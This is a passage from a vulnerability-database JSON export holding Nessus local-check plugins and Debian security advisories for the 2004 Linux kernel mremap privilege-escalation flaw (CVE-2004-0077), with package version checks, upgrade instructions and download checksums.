As a result, arbitrary code can be executed.\n \nImpact :\n\n Arbitrary code with normal non-super-user privileges may be able to\n exploit this vulnerability and may disrupt the operation of other parts\n of the kernel memory management subroutines finally leading to\n unexpected behavior.\n Since no special privileges are required to use the mremap() and\n munmap() system calls any process may misuse this unexpected behavior\n to disrupt the kernel memory management subsystem. Proper exploitation\n of this vulnerability may lead to local privilege escalation allowing\n for the execution of arbitrary code with kernel level root access.\n Proof-of-concept exploit code has been created and successfully tested,\n permitting root escalation on vulnerable systems. As a result, all\n users should upgrade their kernels to new or patched versions.\n \nWorkaround :\n\n Users who are unable to upgrade their kernels may attempt to use\n 'sysctl -w vm.max_map_count=1000000', however, this is a temporary fix\n which only solves the problem by increasing the number of memory areas\n that can be created by each process. 
Because of the static nature of\n this workaround, it is not recommended and users are urged to upgrade\n their systems to the latest available patched sources.\"\n );\n # http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://isec.pl/en/vulnerabilities/isec-0014-mremap-unmap.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200403-02\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Users are encouraged to upgrade to the latest available sources for\n their system:\n # emerge sync\n # emerge -pv your-favourite-sources\n # emerge your-favourite-sources\n # # Follow usual procedure for compiling and installing a kernel.\n # # If you use genkernel, run genkernel as you would do normally.\n # # IF YOUR KERNEL IS MARKED as 'remerge required!' THEN\n # # YOU SHOULD UPDATE YOUR KERNEL EVEN IF PORTAGE\n # # REPORTS THAT THE SAME VERSION IS INSTALLED.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:aa-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:alpha-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:ck-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:compaq-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:development-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:gaming-sources\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:gentoo:linux:gentoo-dev-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:gentoo-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:grsec-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:gs-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:hardened-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:hppa-dev-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:hppa-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:ia64-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:mips-prepatch-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:mips-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:mm-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:openmosix-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:pac-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:planet-ccrma-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:ppc-development-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:ppc-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:ppc-sources-benh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:ppc-sources-crypto\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:ppc-sources-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:selinux-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:sparc-dev-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:sparc-sources\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:usermode-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:vanilla-prepatch-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:vanilla-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:win4lin-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:wolk-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:xfs-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/03/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"sys-kernel/hppa-dev-sources\", unaffected:make_list(\"ge 2.6.2_p3-r1\"), vulnerable:make_list(\"lt 2.6.2_p3-r1\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/hppa-sources\", unaffected:make_list(\"ge 2.4.24_p0-r1\"), vulnerable:make_list(\"lt 2.4.24_p0-r1\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/planet-ccrma-sources\", unaffected:make_list(\"ge 2.4.21-r5\"), vulnerable:make_list(\"lt 
2.4.21-r5\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/openmosix-sources\", unaffected:make_list(\"ge 2.4.22-r4\"), vulnerable:make_list(\"lt 2.4.22-r4\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/development-sources\", unaffected:make_list(\"ge 2.6.3_rc1\"), vulnerable:make_list(\"lt 2.6.3_rc1\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/ppc-sources-benh\", unaffected:make_list(\"ge 2.4.22-r5\"), vulnerable:make_list(\"lt 2.4.22-r5\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/gentoo-dev-sources\", unaffected:make_list(\"ge 2.6.3_rc1\"), vulnerable:make_list(\"lt 2.6.3_rc1\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/vanilla-prepatch-sources\", unaffected:make_list(\"ge 2.4.25_rc4\"), vulnerable:make_list(\"lt 2.4.25_rc4\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/mips-sources\", unaffected:make_list(\"ge 2.4.25_rc4\"), vulnerable:make_list(\"lt 2.4.25_rc4\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/compaq-sources\", unaffected:make_list(\"ge 2.4.9.32.7-r2\"), vulnerable:make_list(\"lt 2.4.9.32.7-r2\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/ppc-sources-crypto\", unaffected:make_list(\"ge 2.4.20-r3\"), vulnerable:make_list(\"lt 2.4.20-r3\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/grsec-sources\", unaffected:make_list(\"ge 2.4.24.1.9.13-r1\"), vulnerable:make_list(\"lt 2.4.24.1.9.13-r1\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/ppc-sources-dev\", unaffected:make_list(\"ge 2.4.24-r2\"), vulnerable:make_list(\"lt 2.4.24-r2\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/gaming-sources\", unaffected:make_list(\"ge 2.4.20-r8\"), vulnerable:make_list(\"lt 2.4.20-r8\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/wolk-sources\", unaffected:make_list(\"eq 4.9-r4\", \"ge 4.10_pre7-r3\"), vulnerable:make_list(\"lt 4.10_pre7-r3\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/vanilla-sources\", unaffected:make_list(\"ge 2.4.25\"), vulnerable:make_list(\"lt 2.4.25\"))) flag++;\nif 
(qpkg_check(package:\"sys-kernel/gentoo-sources\", unaffected:make_list(\"eq 2.4.19-r11\", \"eq 2.4.20-r12\", \"ge 2.4.22-r7\"), vulnerable:make_list(\"lt 2.4.22-r7\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/mips-prepatch-sources\", unaffected:make_list(\"ge 2.4.25_pre6-r1\"), vulnerable:make_list(\"lt 2.4.25_pre6-r1\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/hardened-sources\", unaffected:make_list(\"ge 2.4.24-r1\"), vulnerable:make_list(\"lt 2.4.24-r1\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/aa-sources\", unaffected:make_list(\"ge 2.4.23-r1\"), vulnerable:make_list(\"lt 2.4.23-r1\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/gs-sources\", unaffected:make_list(\"ge 2.4.25_pre7-r2\"), vulnerable:make_list(\"lt 2.4.25_pre7-r2\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/ia64-sources\", unaffected:make_list(\"ge 2.4.24-r1\"), vulnerable:make_list(\"lt 2.4.24-r1\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/pac-sources\", unaffected:make_list(\"ge 2.4.23-r3\"), vulnerable:make_list(\"lt 2.4.23-r3\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/sparc-dev-sources\", unaffected:make_list(\"ge 2.6.3_rc1\"), vulnerable:make_list(\"lt 2.6.3_rc1\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/ppc-development-sources\", unaffected:make_list(\"ge 2.6.3_rc1-r1\"), vulnerable:make_list(\"lt 2.6.3_rc1-r1\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/sparc-sources\", unaffected:make_list(\"ge 2.4.24-r2\"), vulnerable:make_list(\"lt 2.4.24-r2\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/alpha-sources\", unaffected:make_list(\"ge 2.4.21-r4\"), vulnerable:make_list(\"lt 2.4.21-r4\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/xfs-sources\", unaffected:make_list(\"ge 2.4.24-r2\"), vulnerable:make_list(\"lt 2.4.24-r2\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/ppc-sources\", unaffected:make_list(\"ge 2.4.24-r1\"), vulnerable:make_list(\"lt 2.4.24-r1\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/selinux-sources\", 
unaffected:make_list(\"ge 2.4.24-r2\"), vulnerable:make_list(\"lt 2.4.24-r2\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/usermode-sources\", unaffected:make_list(\"rge 2.4.24-r1\", \"rge 2.4.26\", \"ge 2.6.3-r1\"), vulnerable:make_list(\"lt 2.6.3-r1\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/ck-sources\", unaffected:make_list(\"eq 2.4.24-r1\", \"ge 2.6.2-r1\"), vulnerable:make_list(\"lt 2.6.2-r1\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/win4lin-sources\", unaffected:make_list(\"eq 2.4.23-r2\", \"ge 2.6.2-r1\"), vulnerable:make_list(\"lt 2.6.2-r1\"))) flag++;\nif (qpkg_check(package:\"sys-kernel/mm-sources\", unaffected:make_list(\"ge 2.6.3_rc1-r1\"), vulnerable:make_list(\"lt 2.6.3_rc1-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"sys-kernel/hppa-dev-sources / sys-kernel/hppa-sources / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:57:52", "description": "Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. 
However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.", "edition": 26, "published": "2004-09-29T00:00:00", "title": "Debian DSA-454-1 : linux-kernel-2.2.22-alpha - failing function and TLB flush", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0077"], "modified": "2004-09-29T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:kernel-source-2.2.22", "cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:kernel-image-2.2.22-alpha"], "id": "DEBIAN_DSA-454.NASL", "href": "https://www.tenable.com/plugins/nessus/15291", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-454. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15291);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2004-0077\");\n script_bugtraq_id(9686);\n script_xref(name:\"CERT\", value:\"981222\");\n script_xref(name:\"DSA\", value:\"454\");\n\n script_name(english:\"Debian DSA-454-1 : linux-kernel-2.2.22-alpha - failing function and TLB flush\");\n script_summary(english:\"Checks dpkg output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. 
Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2004/dsa-454\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the Linux kernel package.\n\nFor the stable distribution (woody) this problem has been fixed in the\nfollowing versions and architectures :\n\n package arch version \n kernel-source-2.2.22 source 2.2.22-1woody1 \n kernel-image-2.2.22-alpha alpha 2.2.22-2 \n Vulnerability matrix for CAN-2004-0077\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-image-2.2.22-alpha\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-source-2.2.22\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/03/02\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"kernel-doc-2.2.22\", reference:\"2.2.22-1woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.2.22\", reference:\"2.2.22-2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.22-generic\", reference:\"2.2.22-2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.22-jensen\", reference:\"2.2.22-2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.22-nautilus\", reference:\"2.2.22-2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.22-smp\", reference:\"2.2.22-2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-source-2.2.22\", reference:\"2.2.22-1woody1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2019-05-30T02:21:45", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0077"], "description": "- --------------------------------------------------------------------------\nDebian 
Security Advisory DSA 438-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nFebruary 18th, 2004 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : kernel-source-2.4.18, kernel-image-2.4.18-1-alpha, kernel-image-2.4.18-1-i386, kernel-image-2.4.18-i386bf, kernel-patch-2.4.18-powerpc\nVulnerability : missing function return value check\nProblem-Type : local\nDebian-specific: no\nCVE ID : CAN-2004-0077\n\nPaul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to a missing function return value check\nof internal functions, a local attacker can gain root privileges.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 2.4.18-14.2 of kernel-source, version 2.4.18-14 of alpha\nimages, version 2.4.18-12.2 of i386 images, version 2.4.18-5woody7\nof i386bf images and version 2.4.18-1woody4 of powerpc images.\n\nOther architectures will probably be mentioned in a separate advisory or\nare not affected (m68k).\n\nFor the unstable distribution (sid) this problem is fixed in version\n2.4.24-3 for source, i386 and alpha images and version 2.4.22-10 for\npowerpc images.\n\nThis problem is also fixed in the upstream version of Linux 2.4.25 and\n2.6.3.\n\nWe recommend that you upgrade your Linux kernel packages immediately.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source 
archives:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.18/kernel-source-2.4.18_2.4.18-14.2.dsc\n Size/MD5 checksum: 664 38e578dda3dd54a5daa6b8badcac1a58\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.18/kernel-source-2.4.18_2.4.18-14.2.diff.gz\n Size/MD5 checksum: 67490 e1ef6246f639481dfd8b3c5b15d8668e\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.18/kernel-source-2.4.18_2.4.18.orig.tar.gz\n Size/MD5 checksum: 29818323 24b4c45a04a23eb4ce465eb326a6ddf2\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-image-2.4.18-1-alpha_2.4.18-14.dsc\n Size/MD5 checksum: 876 7774c946590a5a80332ca920f67cc8ec\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-image-2.4.18-1-alpha_2.4.18-14.tar.gz\n Size/MD5 checksum: 24477 b9c0ba46774c2da3be69851110d6f2f9\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-i386_2.4.18-12.2.dsc\n Size/MD5 checksum: 1193 b44a4e8f803bb2214bd0c4c3e9f88d81\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-i386_2.4.18-12.2.tar.gz\n Size/MD5 checksum: 70044 f4caad005d02a1c7cadfa73bfc4952fb\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-i386bf/kernel-image-2.4.18-i386bf_2.4.18-5woody7.dsc\n Size/MD5 checksum: 656 e091295663f495df0ea8273703decef0\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-i386bf/kernel-image-2.4.18-i386bf_2.4.18-5woody7.tar.gz\n Size/MD5 checksum: 26249 f84d855e356c1f5290f6fe96d9e039c8\n\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.18-powerpc/kernel-patch-2.4.18-powerpc_2.4.18-1woody4.dsc\n Size/MD5 checksum: 713 7f68980058d55c40a037c6666354ffe9\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.18-powerpc/kernel-patch-2.4.18-powerpc_2.4.18-1woody4.tar.gz\n Size/MD5 checksum: 79541 bff712e95a6960659a0e96dab9732ed4\n\n Architecture 
independent components:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.18/kernel-doc-2.4.18_2.4.18-14.2_all.deb\n Size/MD5 checksum: 1719692 32cb6638a9be7e7f7332152c04854bba\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.18/kernel-source-2.4.18_2.4.18-14.2_all.deb\n Size/MD5 checksum: 24133918 306f15a8a6279221394b6a8ac2c5a69c\n\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.18-powerpc/kernel-patch-2.4.18-powerpc_2.4.18-1woody4_all.deb\n Size/MD5 checksum: 79274 8ea5d169fd45e464c1213e729e4e5368\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-headers-2.4.18-1_2.4.18-14_alpha.deb\n Size/MD5 checksum: 3363042 9ee4da919ccec99281efdaaae303af73\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-headers-2.4.18-1-generic_2.4.18-14_alpha.deb\n Size/MD5 checksum: 3512422 47b306297211fd7079abb918bb10ef37\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-headers-2.4.18-1-smp_2.4.18-14_alpha.deb\n Size/MD5 checksum: 3515048 d0153184a825640d1fe64b905ab98de4\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-image-2.4.18-1-generic_2.4.18-14_alpha.deb\n Size/MD5 checksum: 12425644 aa320665938f55d33bfc8a9593e4639f\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-image-2.4.18-1-smp_2.4.18-14_alpha.deb\n Size/MD5 checksum: 12800414 2901b9a0ff3cabfbb4249ee2cbb94b43\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1_2.4.18-12.2_i386.deb\n Size/MD5 checksum: 3412982 cad64cfd789bfa49fe5463a3b4a8a5bd\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-386_2.4.18-12.2_i386.deb\n Size/MD5 checksum: 3503440 02c707f32c72f98df9002c04006aae6b\n 
http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-586tsc_2.4.18-12.2_i386.deb\n Size/MD5 checksum: 3504340 bd5e69e90ab3be3378f588abbfe23c79\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-686_2.4.18-12.2_i386.deb\n Size/MD5 checksum: 3504232 6ab9026a1484be3aaf7fa08217ae9c5c\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-686-smp_2.4.18-12.2_i386.deb\n Size/MD5 checksum: 3505300 2ffc58a24a13bf0991be5b982026b6c5\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-k6_2.4.18-12.2_i386.deb\n Size/MD5 checksum: 3504034 a448bb692b10914a3a7f7f1d9b16be96\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-k7_2.4.18-12.2_i386.deb\n Size/MD5 checksum: 3504256 349318073fbd9b6f3eae2b7bc5d65b54\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-386_2.4.18-12.2_i386.deb\n Size/MD5 checksum: 8797608 df96f2969970f149992e74cfd7838919\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-586tsc_2.4.18-12.2_i386.deb\n Size/MD5 checksum: 8704208 b29d3a133a3d5485645a1428045481f2\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-686_2.4.18-12.2_i386.deb\n Size/MD5 checksum: 8703628 fdf8ddc2c2fdc0c5ceffb9f34b8dc00f\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-686-smp_2.4.18-12.2_i386.deb\n Size/MD5 checksum: 8959706 da0efa81b152f5ce0e949ba00a58b1f0\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-k6_2.4.18-12.2_i386.deb\n Size/MD5 checksum: 8660826 78ee935b25e3cb8e1d6affc13e78aa35\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-k7_2.4.18-12.2_i386.deb\n 
 PowerPC architecture:\n\n
\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 2, "modified": "2004-02-18T00:00:00", "published": "2004-02-18T00:00:00", "id": "DEBIAN:DSA-438-1:101CF", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00034.html", "title": "[SECURITY] [DSA 438-1] New Linux 2.4.18 packages fix local root exploit (alpha+i386+powerpc)", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-11T13:12:54", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0077"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 441-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nFebruary 18th, 2004 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : kernel-patch-2.4.17-mips\nVulnerability : missing function return value check\nProblem-Type : local\nDebian-specific: no\nCVE ID : CAN-2004-0077\n\nPaul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory 
